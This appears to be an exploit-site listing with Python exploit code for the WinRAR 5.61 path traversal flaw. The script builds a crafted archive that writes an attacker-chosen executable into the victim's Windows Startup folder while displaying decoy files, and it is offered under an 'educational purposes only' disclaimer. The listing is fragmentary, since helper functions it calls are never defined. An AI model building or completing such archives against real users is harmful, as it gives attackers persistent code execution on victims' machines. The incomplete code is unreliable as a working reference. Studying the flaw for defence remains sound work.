Exploits / Vulnerability Discovered : 2019-02-22 |
Type : local |
Platform : windows
This exploit / vulnerability Winrar 5.61 path traversal is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python3
import os
import re
import zlib
import binascii
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]
class AceCRC32:
def __init__(self, buf=b''):
self.__state = 0
if len(buf) > 0:
self += buf
def get_ace_crc32(filename):
with open(filename, 'rb') as f:
return ace_crc32(f.read())
def get_right_hdr_crc(filename):
# This command may be different, it depends on the your Python3 environment.
p = os.popen('py -3 acefile.py --headers %s'%(filename))
res = p.read()
pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
result = pattern.findall(res)
right_hdr_crc = result[0].upper()
return hex2raw4(right_hdr_crc)